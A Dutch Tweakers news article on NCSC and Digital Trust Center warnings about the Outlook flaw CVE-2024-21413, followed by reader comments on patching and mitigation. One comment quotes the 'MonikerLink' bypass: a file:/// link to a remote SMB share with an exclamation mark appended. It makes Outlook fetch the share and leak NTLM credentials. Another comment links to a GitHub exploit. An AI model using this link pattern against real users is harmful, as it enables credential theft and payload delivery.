NCSC en DTC waarschuwen voor Outlook-bug waarvan proof-of-concept online staat

Het Nationaal Cyber Security Centrum waarschuwt voor potentieel misbruik van een bug in Microsoft Office. Die werd deze week gerepareerd, maar volgens het NCSC is er inmiddels een proof-of-concept verschenen waarmee het makkelijk is de bug uit te buiten.

Het NCSC schrijft dat in een advisory die getrackt wordt als NCSC-2024-0063. Daarin worden verschillende kwetsbaarheden in Office en andere Microsoft-apps beschreven. Die kwetsbaarheden werden eerder deze week gerepareerd tijdens Patch Tuesday, maar volgens het NCSC is er nu extra haast geboden bij het installeren van de patches. Ook het Digital Trust Center waarschuwt inmiddels voor de bugs.

Een van de ernstigste bugs die tijdens Patch Tuesday werd gerepareerd, levert nu extra gevaar op. Dat is CVE-2024-21413, een remote code execution-kwetsbaarheid in het Preview-venster van Outlook. Als een aanvaller die bug kan uitbuiten, kan die de Protected View in Outlook omzeilen. De kwetsbaarheid krijgt een CVSS-score van 9.8, al noemt Microsoft het 'onwaarschijnlijk' dat de kwetsbaarheid in de praktijk wordt uitgebuit.

Toch waarschuwt het NCSC nu voor die kwetsbaarheid. "Van de kwetsbaarheid met kenmerk CVE-2024-21413 is proof-of-conceptcode publiek beschikbaar", schrijft het securitycentrum. Dat betekent niet direct gevaar, zegt het Digital Trust Center: "De PoC laat op dit moment alleen de potentie van de uitvoer zien en is niet functioneel. Het NCSC verwacht echter op korte termijn uitvoerbare exploitcode. Dit betekent dat er een grote kans is dat deze kwetsbaarheid wordt misbruikt; de schade hiervan kan groot zijn." De instanties raden beheerders dan ook aan de Patch Tuesday-reparaties snel te installeren.

Door Tijs Hofmans

Nieuwscoördinator

Feedback • 16-02-2024 18:2839

16-02-2024 • 18:28

39 Linkedin Whatsapp

Lees meer

Proof-of-concept voor ernstige bug in Flowmon-netwerktool verschijnt online
Proof-of-concept voor ernstige bug in Flowmon-netwerktool verschijnt online Nieuws van 26 april 2024
Tweede Kamer: overheid mag dreigingsinformatie delen met niet-vitale bedrijven
Tweede Kamer: overheid mag dreigingsinformatie delen met niet-vitale bedrijven Nieuws van 21 maart 2024
Cybersecuritywaarschuwingen van DTC stegen in 2023 van 35.000 naar 156.000
Cybersecuritywaarschuwingen van DTC stegen in 2023 van 35.000 naar 156.000 Nieuws van 11 maart 2024
Microsoft repareert twee zerodays en 73 bugs tijdens Patch Tuesday
Microsoft repareert twee zerodays en 73 bugs tijdens Patch Tuesday Nieuws van 14 februari 2024
Atlassian patcht ernstige remotecode-executionbug in Confluence en Jira
Atlassian patcht ernstige remotecode-executionbug in Confluence en Jira Nieuws van 25 januari 2024
Patch Tuesday-ronde repareert 49 bugs waaronder ernstig lek in Kerberos
Patch Tuesday-ronde repareert 49 bugs waaronder ernstig lek in Kerberos Nieuws van 10 januari 2024
NCSC waarschuwt voor grootschalig lek in MOVEit Transfer-database
NCSC waarschuwt voor grootschalig lek in MOVEit Transfer-database Nieuws van 3 juni 2023
Weerbaarheid tegen cyberdreiging wordt prioriteit in veiligheidsstrategie NL
Weerbaarheid tegen cyberdreiging wordt prioriteit in veiligheidsstrategie NL Nieuws van 4 april 2023
NCSC waarschuwt voor kwetsbaarheid in KeePass die ontwikkelaar niet wil dichten
NCSC waarschuwt voor kwetsbaarheid in KeePass die ontwikkelaar niet wil dichten Nieuws van 26 januari 2023
Fortinet waarschuwt voor actief misbruikte rce-kwetsbaarheid in FortiOS SSL-VPN
Fortinet waarschuwt voor actief misbruikte rce-kwetsbaarheid in FortiOS SSL-VPN Nieuws van 13 december 2022
Meer producten en artikelen
Beveiliging en antivirus DTC NCSC Patch Tuesday

Reacties (39)

-Moderatie-faq
39
38
18
1
0
13
Wijzig sortering
Get!em
16 februari 2024 19:13
#MonikerLink attack

Hier een uitgebreider verhaal en voorbeelden.

https://research.checkpoi...look-and-the-big-picture/
The #MonikerLink Bug

However, if we do a slight modification about the above link, for example, modifying to the following.

*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*
Note that we added a “!” at the end of the “test.rtf” and also added some random characters “something”.

Such a link will bypass the previously discussed existing Outlook security restriction, and Outlook will continue to access the remote resource “\\10.10.111.111\test\test.rtf” when the user clicks the link.

The key point here is the special exclamation mark “!”, which changes the behavior of Outlook.

[Reactie gewijzigd door Get!em op 16 februari 2024 19:18]

mrmrmr
@Get!em17 februari 2024 04:22
Van belang is dat Outlook het bestand via SMB zal proberen te benaderen (als een gedeelde map). Het lekt daarbij de NTLM gebruikersnaam en het bestand kan worden geopend alsof het op een eigen netwerk staat. Een aanvaller in bezit van een Office zero-day zou het kunnen misbruiken voor bezorging van de exploit.

[Reactie gewijzigd door mrmrmr op 17 februari 2024 14:59]

R4gnax
@mrmrmr17 februari 2024 13:44
maw; niet op linkjes klikken in e-mails en niets aan de hand?
mrmrmr
@R4gnax17 februari 2024 15:48
Niet op internet aansluiten, dan is er zeker "niets aan de hand". Voor mensen die wel gebruik willen maken van internet is patchen de oplossing. Een algemene beveiligingsmaatregel is SMB verkeer naar internet dichtzetten. Als je geen SMB gebruikt kun je dat ook uitschakelen (Workstation en Server services).
SED
@mrmrmr18 februari 2024 12:14
Outlook zonder internet wordt natuurlijk wel een uitdaging O-)
Cerberus_tm
@mrmrmr18 februari 2024 06:39
Werkt de exploit ook als je SMB uit hebt staan?
mrmrmr
@Cerberus_tm18 februari 2024 15:25
Voor zover nu bekend is er dan geen remote delivery (bezorgen van een payload) meer. De kwetsbaarheid zelf wordt er niet mee opgelost. Maar het is wel een goede algemene beveiligingsmaatregel om kwetsbare functies die je niet gebruikt uit te schakelen. Daarmee wordt het aanvalsoppervlak kleiner.
Cerberus_tm
@mrmrmr19 februari 2024 04:22
Ja, ik heb het ooit gedaan toen SMB in het nieuws was als kwetsbaar ding.
Polderviking
@Get!em19 februari 2024 10:54
Zoveelste reden om dit soort traffic naar buiten toe gewoon bedrijfsbreed tegen te houden.
lenwar
16 februari 2024 19:14
Zouden virusscanners hier ook niet kunnen helpen? (Als tijdelijk lapmiddel totdat de patches geïnstalleerd zijn) Ik ga er een beetje vanuit dat er virusscanners rechtstreeks in Exchange kunnen haken.

Is de malafide code dan niet te detecteren? Of denk ik nu te simpel met dit soort kwetsbaarheden.
themadone
@lenwar16 februari 2024 19:32
Als ik het zo zie is de poc gebaseerd op smtp afleveren van een email.

Als het goed is accepteren de meeste exchange servers alleen mail van hun anti spam provider en niet zomaar random van het internet.

Wij hebben de adressen van de anti spam in de firewall staan, niemand anders krijgt een smtp connectie direct op de interne mail server.

Dus hoop dat de impact meevalt totdat mecm de patches op de clients heeft.

Het exchange issue was hier gister al gepatcht btw. Mocht je niet de hele cu kunnen of willen installeren heeft Microsoft een Powershell script beschikbaar voor mitigation, het enige wat er gebeurt is een iisreset achtige actie aan het einde van het script dus die impact is zeer laag als het goed is en kun je zelfs zonder groot service window gewoon draaien.
Blokker_1999
@lenwar17 februari 2024 11:37
Security behoort altijd uit meerdere lagen te bestaan. Een virusscanner kan in dit geval onderdeel zijn van de bescherming, op voorwaarde dat deze emails op inhoud kan scannen en analyseren. Daarnaast kan je bijvoorbeeld ook een firewall hebben die malwaresites zo snel mogelijk gaat blokkeren. Maar met voldoende kennis blijft het mogelijk om een gerichte aanval uit te voeren of om alsnog een sleepnet aanval uit te voeren waarbij je zo snel mogelijk, zo veel mogelijk mensen probeert te besmetten wat vooral thuisgebruikers weer vatbaarder maakt.
geldi001
16 februari 2024 19:06
En dat terwijl heel veel mensen 2 versies gedowngrade hebben naar versie 2312 omdat Exchange Active Sync niet werkt in versie 2401.

https://learn.microsoft.c...tivesync-connect-exchange
Blokker_1999
@geldi00117 februari 2024 11:33
En dan vraag ik me direct af naar welke service je gaat verbinden daar Exchange het volgens het artikel dat jij linkt al bijna 2 jaar niet meer ondersteunt.

Daarnaast gaat het vaak om zakelijke omgevingen wanneer ik EAS hoor en ik hoop dat men zakelijk toch zo slim is om op de Monthly Enterprise Channel te gaan werken, en dan loop je sowieso 2 feature releases achter maar ben je wel bij met security updates.
geldi001
@Blokker_199917 februari 2024 18:06
Mijn (hosting) provider gebruikt geen Exchange, ik vermoed dat ze kerio connect gebruiken.
geldi001
@geldi0016 maart 2024 13:49
Dit niet verbinden met EAS is gefixt in ieder geval met de maart update van Office 365
basmq
16 februari 2024 19:19
Er is een exploit gepubliceerd op Github:
https://github.com/xaitax...e-Execution-Vulnerability
Techno Overlord
16 februari 2024 19:37
Is het voldoende om de Outlook patch KB5002467 voor Office 2016 te installeren? Of is het beter om ook een mail route policy/content rule te gebruiken op je Secure Email Gateway of spam filter waarmee URL's met een uitroepteken erin in quarantaine of gesanitized worden? Of uberhaupt geen file URL's meer toe te laten?
Vinez Initez
16 februari 2024 20:10
Volgende keer graag op maandag ochtend posten ipv vrijdag. Denk aan de ITers
jurroen
@Vinez Initez17 februari 2024 00:49
Ehm ja 8)7 Want als Tweakers het bericht maandag plaatst wacht de rest van de wereld wel even met hun exploits :P

Ik ben eigenlijk wel blij met dit soort berichten. Stel dat ik het via andere bronnen gemist heb, kan ik op deze manier nog even patchen voor het weekend. En niet bang zijn om maandag terug te komen en te merken dat alle clients slacbtoffer zijn gewordrn van ransomware. Dat vind ik een biertje missen zeker waard :+
Vorkie
16 februari 2024 18:44
Nieuws poster is zeker geen IT’er, dit nieuws op vrijdagavond te posten…

Maar goed, de patches gaan lekker door zo.
StackMySwitchUp
@Vorkie16 februari 2024 18:53
We hoorden dit zelf ook pas tegen 15:00, en volgens mij waren we er nog vroeg bij... altijd leuk op vrijdagmiddag -.-
_Dune_
@StackMySwitchUp16 februari 2024 18:57
Wij waren gisteravond reeds op de hoogte eerst patch ook reeds uitgevoerd, vanavond gaat de rest (Exchange). Niet alleen Outlook heeft een issue, Exchange zelf ook (combi)
StackMySwitchUp
@_Dune_16 februari 2024 18:59
Exchange hadden we gisteren opgepakt maar dat outlook pocje kwam vandaag pas aan het licht. Houdt ons van de straat :)
Techno Overlord
@_Dune_16 februari 2024 19:41
Bedoel je het inschakelen van Windows Extended Protection op de Exchange servers? Bij ons staat SSL offloading op de load balacers aan en WEP werkt daar niet mee. Wel met SSL bridging en dat ondersteunen onze load balancers ook. Met behulp van een certificaat wordt het SSL verkeer opengebroken en re-ecrypted. Uitvechten wat zwaarder weegt mogen de security mannen zich mooi uitvechten.
t2012
@Vorkie16 februari 2024 18:55
Exchange lekken lijken me inderdaad een risico op vrijdagavond. Dit lijkt om een bug in de Outlook client te gaan. Ik denk dus aan Windows en misschien ook Mac. Aangezien hier bewust en geïnfecteerde email gestuurd moet worden is de kans juist kleiner dat een gebruiker deze opent op zn laptop maar op zn mobiel die mogelijk niet kwetsbaar is.
AuteurTijsZonderH
@Vorkie16 februari 2024 19:00
Hey als ik vrijdagavond moet werken moeten jullie het ook!
Vorkie
@TijsZonderH16 februari 2024 20:08
Haha dank je wel :D
Triblade_8472
@TijsZonderH17 februari 2024 00:07
Zeker, alles is weer netjes gepatched. Bedankt voor de melding!
Blokker_1999
@Triblade_847217 februari 2024 11:38
Was het maar zo eenvoudig, duizenden clients patchen duurt even ...
Triblade_8472
@Blokker_199917 februari 2024 12:34
Waarom? 1x binnenhalen op een centrale locatie en gescript aftrappen.
aikebah
@Vorkie17 februari 2024 13:55
Je hoorde als IT-er dit nieuws natuurlijk al first-hand van Microsoft op dinsdag (critical update met patch voor een CVSS 9.8 issue), dus een vervolgwaarschuwing over voor een hacker zeer waardevolle informatie die publiekelijk beschikbaar is (de PoC middels een applicatie-crash van MS Word op een kwaadwillende RTF) is dan, zelfs op vrijdag, nog zeer welkom.
hackerhater
17 februari 2024 09:48
Hmmm vandaar dat die applicaties ineens afgesloten waren op de klant laptop.
Was nice geweest als ze erna ook herstart werden, of in ieder geval een notificatie |:(
divvid
@hackerhater17 februari 2024 22:11
Is dat zo erg dan? Klant heeft ook een stukje verantwoordelijkheid om bij het ‘weglopen’ van z’ laptop ff alles op te slaan. Na vrijdag vijf kijk ik sowieso niet meer naar het windows werk scherm, totaal irrelevant to maandag morgen.
hackerhater
@divvid17 februari 2024 22:58
Het was meer dat de applicaties af sloten mid werkdag zonder notificatie ;)
Ik had dus niet door dat ik "offline" was voor een paar uur.

Klant laptop als in: de laptop die ik van mijn klant moet gebruiken (data veiligheid) als freelancer.

[Reactie gewijzigd door hackerhater op 17 februari 2024 22:59]

divvid
@hackerhater18 februari 2024 07:27
Da’s wel bot van IT
hackerhater
@divvid18 februari 2024 10:12
Jup. Naja
Railgunner
19 februari 2024 10:02
@TijsZonderH Het lek is toch niet als zeroday misbruikt: https://www.security.nl/p...iet+misbruikt+als+zeroday

Op dit item kan niet meer gereageerd worden.

Tweakers maakt gebruik van cookies

Tweakers plaatst functionele en analytische cookies voor het functioneren van de website en het verbeteren van de website-ervaring. Deze cookies zijn noodzakelijk. Om op Tweakers relevantere advertenties te tonen en om ingesloten content van derden te tonen (bijvoorbeeld video's), vragen we je toestemming. Via ingesloten content kunnen derde partijen diensten leveren en verbeteren, bezoekersstatistieken bijhouden, gepersonaliseerde content tonen, gerichte advertenties tonen en gebruikersprofielen opbouwen. Hiervoor worden apparaatgegevens, IP-adres, geolocatie en surfgedrag vastgelegd.

Meer informatie vind je in ons cookiebeleid.

Sluiten

Toestemming beheren

Hieronder kun je per doeleinde of partij toestemming geven of intrekken. Meer informatie vind je in ons cookiebeleid.

Functioneel en analytisch

Deze cookies zijn noodzakelijk voor het functioneren van de website en het verbeteren van de website-ervaring. Klik op het informatie-icoon voor meer informatie. Meer details

janee

    Relevantere advertenties

    Dit beperkt het aantal keer dat dezelfde advertentie getoond wordt (frequency capping) en maakt het mogelijk om binnen Tweakers contextuele advertenties te tonen op basis van pagina's die je hebt bezocht. Meer details

    Tweakers genereert een willekeurige unieke code als identifier. Deze data wordt niet gedeeld met adverteerders of andere derde partijen en je kunt niet buiten Tweakers gevolgd worden. Indien je bent ingelogd, wordt deze identifier gekoppeld aan je account. Indien je niet bent ingelogd, wordt deze identifier gekoppeld aan je sessie die maximaal 4 maanden actief blijft. Je kunt deze toestemming te allen tijde intrekken.

    Ingesloten content van derden

    Deze cookies kunnen door derde partijen geplaatst worden via ingesloten content. Klik op het informatie-icoon voor meer informatie over de verwerkingsdoeleinden. Meer details

    janee